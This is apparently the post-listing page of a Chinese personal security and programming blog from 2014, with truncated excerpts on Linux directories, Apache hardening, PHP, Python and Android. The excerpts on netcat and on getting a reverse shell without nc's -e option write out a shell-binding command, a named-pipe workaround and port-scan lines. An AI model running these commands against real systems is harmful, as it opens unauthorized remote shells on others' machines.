Linxu 下重要文件

Aug 24,2014 in Linux read (4400)

/：根目录 / boot：系统内核映像以及启动文件 / tmp：系统临时文件，用户临时文件在 / var/tmp/lib：启动时需要的库文件，非启动时需要的库文件放在 / usr/lib，内核模块放在 / lib/modules/(kernel version) 下 / proc：系统状态，实际上磁...

继续阅读

配置隐藏 Apache 版本号

Aug 23,2014 in Web read (4411)

在 httpd.conf 中有两处需要修改。1.ServerTokens 该选项用于控制服务器是否响应来自客户端的请求，向客户端输出服务器系统类型或者其他重要信息。为了保证安全，应该改为 ProductOnly 大部分默认情况下为 OS2.ServerSignature 该选项控制由系统...

继续阅读

nc 常见用法以及转发命令

Aug 12,2014 in 安全研究 read (6056)

scan port#scan special portnc -v ip port#scan from port1 to port2nc -v -z ip port1-port2listen local port#listen local portnc -l -p port#...

继续阅读

PHP 中的伪随机数字

Aug 10,2014 in Web, 安全研究 read (4507)

PHP 中使用 srand 来初始化随机数，通常选用 time() 函数来生成种子，但是这也带来了安全问题，也就是如果我可以获取这个种子，那么我就 · 可以生成这个特定的随机数，换句话说，相同的种子会产生相同的随机数，写个脚本测试一下。<?php $sead = time()...

继续阅读

当 NC 不存在 - e 参数时反弹 shell

Jul 14,2014 in 安全研究 read (6656)

Unix 系统一般都有 NC 的，但是 - e 选项一般都默认不编译。原生的反弹 shell 做法是 nc -l -vv -p 2222 -e /bin/bash 如果这样无法反弹的话，可以尝试下面的方法现在 / tmp 下创建一个普通管道 mknod /tmp/backpipe p 或 mkfifo /...

继续阅读

Python urllib2

Jul 14,2014 in Python read (10571)

通过 urllib2 获取网页内容 import urllib2response = urllib2.urlopen('http://www.baidu.com')html = response.read()print html####import urllib2req = ur...

继续阅读

Python 之一个脑残的问题

Jul 14,2014 in Python,Code Review read (20013)

本来想写一个可以编码解码 BASE64 的小脚本，结果出了个问题，使用 base64.b64encoding(str) 的时候，总提示模块中没有这个方法，于是 dir(base64)，发现只有寥寥几个方法，根本没有编码和解码的方法。文件如下：import sysimport base...

继续阅读

通过 Intent 在 Activity 间传递数据

Jul 11,2014 in Android read (4699)

我们先在 MainActivity 中添加一个按钮 < FrameLayout xmlns:android="http://schemas.android.com/apk/res/android"xmlns:tools="http://s...

继续阅读

PHP 上传文件引发的思考

Jul 10,2014 in Web, 安全研究 read (7453)

正常情况下 PHP 上传文件的代码一般都是下面这个样子的。<html> <form action="upload.php"method="post"enctype="multipart/form-da...

继续阅读

lightless blog

Linxu 下重要文件

配置隐藏 Apache 版本号

nc 常见用法以及转发命令

PHP 中的伪随机数字

当 NC 不存在 - e 参数时反弹 shell

Python urllib2

Python 之一个脑残的问题

通过 Intent 在 Activity 间传递数据

PHP 上传文件引发的思考

lightless

弱小和无知不是生存障碍，傲慢才是。